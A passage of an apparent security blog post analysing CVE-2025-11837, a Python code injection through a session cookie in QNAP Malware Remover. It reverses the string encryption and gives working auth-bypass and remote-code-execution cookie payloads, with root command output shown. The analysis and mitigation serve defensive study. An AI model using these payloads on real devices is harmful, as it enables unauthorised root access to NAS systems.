        <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="p">)</span><span class="n">v8</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">((</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v9</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">v10</span> <span class="o">=</span> <span class="n">v8</span><span class="p">;</span>
            <span class="k">while</span> <span class="p">(</span><span class="n">isalnum</span><span class="p">(</span><span class="n">v9</span><span class="p">))</span> <span class="p">{</span>           <span class="c1">// ② per-char isalnum whitelist ← new</span>
                <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="p">)</span><span class="o">++</span><span class="n">v10</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v9</span><span class="p">)</span> <span class="k">goto</span> <span class="n">LABEL_28</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">goto</span> <span class="n">LABEL_25</span><span class="p">;</span>                  <span class="c1">// non-alnum char → skip this cookie</span>
        <span class="p">}</span>
<span class="nl">LABEL_28:</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">v116</span><span class="p">,</span> <span class="mh">0x400</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">byte_21A000</span><span class="p">,</span> <span class="n">v86</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">v16</span><span class="p">);</span>
        <span class="n">sub_95D0</span><span class="p">(...);</span>                      <span class="c1">// popen_pipeline_exec</span>
    <span class="p">}</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>6.6.7 concatenates the cookie value into a string template with no validation and executes it. 6.6.8 adds two checks before concatenation: length at most 32, and every character alphanumeric.</p>

<h3 id="limitations-imposed-by-string-encryption"><span class="me-2">Limitations Imposed by String Encryption</span><a href="#limitations-imposed-by-string-encryption" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Revisiting the key call in 6.6.7:</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">sub_9570</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="mi">64</span><span class="p">,</span> <span class="o">::</span><span class="n">dest</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">unk_16294</span><span class="p">,</span> <span class="n">v114</span><span class="p">,</span> <span class="p">...);</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The three key operands are all ciphertext placeholders in IDA, with no plaintext visible:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Operand</th>
      <th>IDA display</th>
      <th>Actual meaning (unknown)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">::dest</code></td>
      <td>no plaintext string</td>
      <td>interpreter path (<code class="language-plaintext highlighter-rouge">sh</code>? <code class="language-plaintext highlighter-rouge">python</code>?)</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">&amp;unk_16294</code></td>
      <td><code class="language-plaintext highlighter-rouge">unk_</code> (unknown) prefix</td>
      <td>command argument (<code class="language-plaintext highlighter-rouge">-c</code>? or something else?)</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">&amp;byte_21A9C0</code> (template in the snprintf above)</td>
      <td><code class="language-plaintext highlighter-rouge">byte_</code> prefix</td>
      <td>command/code template (how is the cookie concatenated?)</td>
    </tr>
  </tbody>
</table></div>

<p>The <code class="language-plaintext highlighter-rouge">unk_</code> and <code class="language-plaintext highlighter-rouge">byte_</code> prefixes are clear IDA signals: these locations hold raw byte data, not recognized as strings — because they are ciphertext.</p>

<p>Although the <code class="language-plaintext highlighter-rouge">isalnum</code> whitelist in the fixed version already reveals that the injection vector is the cookie, this line does not show <strong>what</strong> it is injected into. The following three combinations correspond to <strong>fundamentally different exploitation approaches</strong>:</p>

<ul>
  <li>Template is <code class="language-plaintext highlighter-rouge">sh -c "...%s..."</code> → shell injection, payload is <code class="language-plaintext highlighter-rouge">;command</code> (CWE-78)</li>
  <li>Template is <code class="language-plaintext highlighter-rouge">python -c "...%s..."</code> → Python code injection, payload is <code class="language-plaintext highlighter-rouge">');import os;...</code> (CWE-94)</li>
  <li>The template’s quote style (<code class="language-plaintext highlighter-rouge">'</code> / <code class="language-plaintext highlighter-rouge">"</code> / none) determines the payload’s closing method</li>
</ul>

<p>The CVE record labels this CWE-94 (code injection), but intelligence requires verification — only by recovering the template plaintext can the injection language be confirmed and a usable PoC constructed. With the template plaintext unknown:</p>

<ul>
  <li>Unknown injection language → payload syntax cannot be constructed</li>
  <li>Unknown quote style → closing method cannot be determined</li>
  <li>CWE-78 and CWE-94 cannot even be distinguished</li>
</ul>

<p><strong>Conclusion: string decryption becomes a hard blocker for the analysis.</strong> Without recovering the three plaintexts — template, interpreter, argument — all subsequent PoC construction is impossible. The analysis must therefore temporarily leave the vulnerability logic itself and turn to reversing the string encryption algorithm. This is a typical anti-analysis approach in vendor binaries like QNAP’s: <strong>the logic is not hidden, only the strings are</strong>, forcing the analyst to break the string layer before proceeding.</p>

<h2 id="reversing-the-string-encryption"><span class="me-2">Reversing the String Encryption</span><a href="#reversing-the-string-encryption" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>At startup, <code class="language-plaintext highlighter-rouge">main</code> calls a batch of <code class="language-plaintext highlighter-rouge">sub_B420</code> / <code class="language-plaintext highlighter-rouge">sub_B3C0</code> to decrypt <code class="language-plaintext highlighter-rouge">.data</code>-section ciphertext. Decompiling the decryptors reveals two stages.</p>

<p>Stage two (subtraction, <code class="language-plaintext highlighter-rouge">sub_B3C0</code>):</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="kt">void</span> <span class="nf">sub_B3C0</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">dest</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>        <span class="c1">// key length</span>
    <span class="kt">int</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dest</span><span class="p">);</span>     <span class="c1">// ciphertext length</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">v4</span> <span class="o">=</span> <span class="n">calloc</span><span class="p">(</span><span class="n">v3</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">v3</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">v4</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="n">v2</span><span class="p">];</span>   <span class="c1">// signed byte subtraction</span>
    <span class="n">strncpy</span><span class="p">(</span><span class="n">dest</span><span class="p">,</span> <span class="n">v4</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">v4</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Stage one (XOR pre-processing, <code class="language-plaintext highlighter-rouge">sub_B4C0</code> / <code class="language-plaintext highlighter-rouge">sub_B520</code>):</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="c1">// single-byte v6 = a2 ^ a3 = 243 ^ 246 = 5, XOR'd into the key itself</span>
<span class="n">v6</span> <span class="o">=</span> <span class="mi">243</span> <span class="o">^</span> <span class="mi">246</span><span class="p">;</span>  <span class="c1">// = 0x05</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">len</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="n">key</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^=</span> <span class="n">v6</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The first decryption attempt used the raw key directly for <code class="language-plaintext highlighter-rouge">cipher - key</code> and produced garbage. The reason: <code class="language-plaintext highlighter-rouge">sub_B520</code> first XORs <strong>the key itself</strong> with <code class="language-plaintext highlighter-rouge">0x05</code>, so the real key differs from the raw key. After correction:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">real_key</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">raw_key</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="mh">0x05</span>            <span class="c1"># pre-process the key
</span><span class="n">plain</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>    <span class="o">=</span> <span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="n">real_key</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="mi">32</span><span class="p">]</span>  <span class="c1"># decrypt with the pre-processed key
</span></pre></td></tr></tbody></table></code></div></div>

<p>The global key lives at <code class="language-plaintext highlighter-rouge">0x21aa40</code>, 32 bytes long.</p>

<h2 id="injection-point-reconstruction"><span class="me-2">Injection Point Reconstruction</span><a href="#injection-point-reconstruction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>An IDA Python script decrypts every relevant field in the 6.6.7 IDB. Results:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Address</th>
      <th>Purpose</th>
      <th>Decrypted plaintext</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>0x21aa20</td>
      <td>interpreter path</td>
      <td><code class="language-plaintext highlighter-rouge">/mnt/ext/opt/Python/bin/python</code></td>
    </tr>
    <tr>
      <td>0x21a9c0</td>
      <td><strong>auth template</strong></td>
      <td><code class="language-plaintext highlighter-rouge">import sys;sys.path.append('%s');from qnap_helper import check_sid;print(check_sid('%s'))</code></td>
    </tr>
    <tr>
      <td>0x21a940</td>
      <td>business template head</td>
      <td><code class="language-plaintext highlighter-rouge">import sys;sys.path.append('%s');from web_interface import WebInterface;</code></td>
    </tr>
    <tr>
      <td>0x21a900</td>
      <td>scan action</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().start_scanning())</code></td>
    </tr>
    <tr>
      <td>0x21a8c0</td>
      <td>stop</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().stop_scanning())</code></td>
    </tr>
    <tr>
      <td>0x21a880</td>
      <td>status</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_scan_status())</code></td>
    </tr>
    <tr>
      <td>0x21a840</td>
      <td>setting GET</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_setting())</code></td>
    </tr>
    <tr>
      <td>0x21a800</td>
      <td>setting PUT</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().set_setting(sys.argv[1]))</code></td>
    </tr>
    <tr>
      <td>0x21a7c0</td>
      <td>background_task</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().background_task())</code></td>
    </tr>
    <tr>
      <td>0x21a780</td>
      <td>about</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_about_info())</code></td>
    </tr>
    <tr>
      <td>0x21a740</td>
      <td>system_status</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_system_status())</code></td>
    </tr>
    <tr>
      <td>0x16294</td>
      <td>argument</td>
      <td><code class="language-plaintext highlighter-rouge">-c</code></td>
    </tr>
    <tr>
      <td>0x21a9a6</td>
      <td>cookie name #0</td>
      <td><code class="language-plaintext highlighter-rouge">QTS_SSID</code></td>
    </tr>
    <tr>
      <td>0x21a999</td>
      <td>cookie name #1</td>
      <td><code class="language-plaintext highlighter-rouge">QTS_SSL_SSID</code></td>
    </tr>
    <tr>
      <td>0x21a991</td>
      <td>cookie name #2</td>
      <td><code class="language-plaintext highlighter-rouge">NAS_SID</code></td>
    </tr>
    <tr>
      <td>0x21a989</td>
      <td>cookie name #3</td>
      <td><code class="language-plaintext highlighter-rouge">nas_sid</code></td>
    </tr>
  </tbody>
</table></div>

<p>The <code class="language-plaintext highlighter-rouge">0x21a9c0</code> field determines the vulnerability’s nature: <strong>this is not shell injection, it is Python code injection.</strong></p>

<p>The CGI concatenates the cookie value into a Python source string:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span><span class="p">;</span><span class="n">sys</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="sh">'</span><span class="s">%s</span><span class="sh">'</span><span class="p">);</span>
<span class="kn">from</span> <span class="n">qnap_helper</span> <span class="kn">import</span> <span class="n">check_sid</span><span class="p">;</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">check_sid</span><span class="p">(</span><span class="sh">'</span><span class="s">&lt;cookie value&gt;</span><span class="sh">'</span><span class="p">))</span>     <span class="c1"># ← attacker controls this
</span></pre></td></tr></tbody></table></code></div></div>

<p>It is then executed with <code class="language-plaintext highlighter-rouge">/mnt/ext/opt/Python/bin/python -c &lt;entire script&gt;</code>. An attacker only needs to close the single quotes around <code class="language-plaintext highlighter-rouge">check_sid('...')</code> to inject an arbitrary Python expression. This is consistent with the definition of CWE-94 (Improper Control of Generation of Code) — what gets concatenated is code, not data.</p>

<p>This also explains the distinction from the earlier QSA-21-16: QSA-21-16 was a command injection, while this case is a Python code injection. The form differs, but the root cause is the same — external input concatenated into executable content without validation.</p>

<p>The full call chain:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>attacker HTTP request
  │  Cookie: QTS_SSID=&lt;payload&gt;
  ▼
Apache (rewrite → malware_remover.cgi)
  ▼
main() reads HTTP_COOKIE
  │  regex extracts QTS_SSID=&lt;value&gt;     ← no validation
  │  snprintf(template, modules_path, &lt;value&gt;)  ← builds Python source
  ▼
popen_pipeline_exec("python","-c",&lt;script&gt;)
  │  pipe + fork + dup2 + execvp
  ▼
Python runs attacker-built code  ← RCE
</pre></td></tr></tbody></table></code></div></div>

<p>The CGI also checks the Python output with <code class="language-plaintext highlighter-rouge">strncasecmp(result, "True", 4)</code> to decide whether authentication passed. The injection therefore not only executes code, it can also bypass authentication simultaneously.</p>

<h2 id="poc-construction-and-cookie-character-constraint"><span class="me-2">PoC Construction and Cookie Character Constraint</span><a href="#poc-construction-and-cookie-character-constraint" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The injection logic is straightforward: close the single quotes around <code class="language-plaintext highlighter-rouge">check_sid('...')</code> and append an arbitrary expression. The initial payload:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>x')+(__import__('os').system('echo PWN'))+check_sid('
</pre></td></tr></tbody></table></code></div></div>

<p>The assembled Python is a valid expression. But in testing every payload failed, all returning <code class="language-plaintext highlighter-rouge">{"status":401}</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>baseline AAAA:           1.07s  HTTP 200  {"status":401}
auth bypass:             1.12s  HTTP 200  {"status":401}  ← should be 200
syntax break zzz))):     0.05s  HTTP 200  {"status":401}
exception trigger 1/0:   0.02s  HTTP 200  {"status":401}
</pre></td></tr></tbody></table></code></div></div>

<p>The key lies in the response timing. A pure alphanumeric cookie takes 1.07 seconds, consistent with the Python interpreter starting up, confirming the request reached the CGI. Payloads with special characters take 0.05 seconds, far too short: the CGI was never invoked. The web server rejected the request before it reached the CGI.</p>

<p>The problem is the legal character set for HTTP cookie values. RFC 6265 plus Apache’s strict parsing forbids spaces in cookie values. The original payload has spaces after <code class="language-plaintext highlighter-rouge">or</code> and around <code class="language-plaintext highlighter-rouge">import</code>; Apache sees a space and drops the whole request.</p>

<p>The solution is to substitute TAB (<code class="language-plaintext highlighter-rouge">\t</code>) for the space. TAB is not in the cookie forbidden-character list, the Python lexer treats it as whitespace, and the shell accepts it as a command separator. The corrected auth-bypass payload:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>x')or'TruePWN'or('
</pre></td></tr></tbody></table></code></div></div>

<p>This payload contains no spaces and is usable directly. The RCE payload with Python keywords uses TAB between keywords:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>x')or	__import__('time').sleep(6)	or'TrueSLEEP'or(
</pre></td></tr></tbody></table></code></div></div>

<h2 id="authentication-bypass-verification"><span class="me-2">Authentication Bypass Verification</span><a href="#authentication-bypass-verification" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>First, verifying the authentication bypass. Payload <code class="language-plaintext highlighter-rouge">x')or'TruePWN'or('</code>, assembled Python:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nf">print</span><span class="p">(</span><span class="nf">check_sid</span><span class="p">(</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span><span class="p">)</span><span class="ow">or</span><span class="sh">'</span><span class="s">TruePWN</span><span class="sh">'</span><span class="ow">or</span><span class="p">(</span><span class="sh">''</span><span class="p">))</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Execution logic: <code class="language-plaintext highlighter-rouge">check_sid('x')</code> returns falsy (‘x’ is not a valid session), <code class="language-plaintext highlighter-rouge">or</code> short-circuits to <code class="language-plaintext highlighter-rouge">'TruePWN'</code>, <code class="language-plaintext highlighter-rouge">print</code> outputs a string starting with <code class="language-plaintext highlighter-rouge">True</code>, the CGI’s <code class="language-plaintext highlighter-rouge">strncasecmp</code> accepts it as authenticated, and the <code class="language-plaintext highlighter-rouge">action=status</code> handler returns protected data. Testing returned the <code class="language-plaintext highlighter-rouge">status:200</code> scan-state JSON; the bypass holds.</p>

<p><a href="/assets/img/20260622/20260701-152352.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152352.jpg" alt="" loading="lazy"></a></p>

<h2 id="command-echo"><span class="me-2">Command Echo</span><a href="#command-echo" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The auth-injection path yields no echo. To obtain command output, an alternative route is needed: write the command result to a web-reachable directory and fetch it over HTTP. The Apache Alias exposes the path:</p>

<div class="language-apache highlighter-rouge"><div class="code-header">
        <span data-label-text="Apache"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nc">Alias</span> /malware_remover "/home/httpd/cgi-bin/qpkg/MalwareRemover"
</pre></td></tr></tbody></table></code></div></div>

<p>The <code class="language-plaintext highlighter-rouge">/home/httpd/cgi-bin/qpkg/MalwareRemover/</code> directory is reachable via <code class="language-plaintext highlighter-rouge">/malware_remover/&lt;filename&gt;</code>. The payload redirects the output of <code class="language-plaintext highlighter-rouge">id</code> into <code class="language-plaintext highlighter-rouge">leak.txt</code> in that directory:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>Cookie: QTS_SSID=x')or[__import__('os').system('id&gt;	/home/httpd/cgi-bin/qpkg/MalwareRemover/leak.txt'),'TrueRCE'][1]or(
</pre></td></tr></tbody></table></code></div></div>

<p>The list index <code class="language-plaintext highlighter-rouge">[system(...),'TrueRCE'][1]</code> keeps the expression returning <code class="language-plaintext highlighter-rouge">'TrueRCE'</code> (so the CGI authenticates), while the side effect of <code class="language-plaintext highlighter-rouge">os.system</code> has already written the file. The file is then retrieved via <code class="language-plaintext highlighter-rouge">curl https://target/malware_remover/leak.txt</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>id:      uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
uname:   Linux NAS50F9BF 5.10.60-qnap #1 SMP Fri Apr 19 02:06:34 CST 2024 x86_64
whoami:  admin
passwd:  admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh
</pre></td></tr></tbody></table></code></div></div>

<p>Executed as <code class="language-plaintext highlighter-rouge">uid=0</code> (root), able to read <code class="language-plaintext highlighter-rouge">/etc/passwd</code> and other sensitive files.</p>

<h2 id="fix-analysis"><span class="me-2">Fix Analysis</span><a href="#fix-analysis" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The 6.6.8 fix lands in <code class="language-plaintext highlighter-rouge">main</code>, adding two checks on the cookie value: length at most 32 bytes, and every character passing <code class="language-plaintext highlighter-rouge">isalnum</code>. These two constraints close off both the single-quote close and the expression injection — the attacker can no longer put any non-alphanumeric character into the template, and the Python code injection entry point is shut.</p>

<p>From an engineering standpoint the fix is well placed. It does not rewrite the auth template or change the execution method; it puts a whitelist on the boundary where external input enters the code template. That is the most thorough fix for CWE-94: if you cannot trust the input being concatenated into source code, constrain it to alphanumeric before concatenation.</p>

<h2 id="methodology-review"><span class="me-2">Methodology Review</span><a href="#methodology-review" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Stage</th>
      <th>Finding</th>
      <th>Significance</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Import-table diff</td>
      <td><code class="language-plaintext highlighter-rouge">isalnum</code> is the only addition</td>
      <td>One symbol classifies the whole vulnerability</td>
    </tr>
    <tr>
      <td>String decryption</td>
      <td><code class="language-plaintext highlighter-rouge">check_sid('%s')</code> is Python</td>
      <td>Reclassifies from shell injection to code injection</td>
    </tr>
    <tr>
      <td>PoC all failing</td>
      <td>cookie value forbids spaces</td>
      <td>Explains every failure; TAB is the bypass</td>
    </tr>
  </tbody>
</table></div>

<p>Looking back at the analysis, the highest-yield first step was the import-table diff. A single added <code class="language-plaintext highlighter-rouge">isalnum</code>, paired with the CWE-94 label, allows determining the vulnerability class without reading any decompilation. The XOR key pre-processing in the string decryptor should have been noticed earlier. The cookie-no-spaces issue would have cost less time if tested from the start with a minimal payload (just closing the single quote, no spaces at all).</p>

<h2 id="timeline"><span class="me-2">Timeline</span><a href="#timeline" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Date</th>
      <th>Event</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2025-10-23</td>
      <td>Fixed version 6.6.8.20251023 released</td>
    </tr>
    <tr>
      <td>2026-06-22</td>
      <td>Firmware reverse engineering, vulnerability located and reproduced</td>
    </tr>
  </tbody>
</table></div>

<h2 id="mitigation"><span class="me-2">Mitigation</span><a href="#mitigation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li><strong>Upgrade immediately</strong> to Malware Remover 6.6.8.20251023 or newer</li>
  <li>If immediate upgrade is not possible, reduce the network exposure of the NAS management interface and keep it off the public internet</li>
  <li>Review web access logs for anomalous <code class="language-plaintext highlighter-rouge">/malware_remover/</code> requests or unusual cookie values</li>
</ol>

<h2 id="conclusion"><span class="me-2">Conclusion</span><a href="#conclusion" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2025-11837 is a typical Python code injection obscured by the “code injection” label and an empty public record. The difficulty lies not in exploitation — closing a single quote and appending an expression is standard — but in tracing from a single <code class="language-plaintext highlighter-rouge">isalnum</code> addition between two versions back to the Python template obscured by string encryption, then confirming the injection is source concatenation rather than shell command concatenation.</p>

<p>The case shows that CWE-94 does not necessarily mean <code class="language-plaintext highlighter-rouge">eval</code> or a shell call. Anything where external input is concatenated into executable code text qualifies. The fix also points to the correct boundary: do not try to sanitize the entire code string, constrain the input to alphanumeric before it reaches the template.</p>

<h2 id="references"><span class="me-2">References</span><a href="#references" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><a href="https://www.qnap.com/en-us/security-advisory/qsa-25-47">QNAP Security Advisory QSA-25-47 (Malware Remover, PWN2OWN 2025)</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11837">NVD CVE-2025-11837</a></li>
</ul>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/vulnerability/">vulnerability</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/cve/"
            class="post-tag no-text-decoration"
          >CVE</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=CVE-2025-11837%20Deep%20Dive%20Python%20Code%20Injection%20Vulnerability%20in%20QNAP%20Malware%20Remover%20-%20imjdl%20blog&url=%2Fposts%2Fblog_cve_2025_11837_en%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

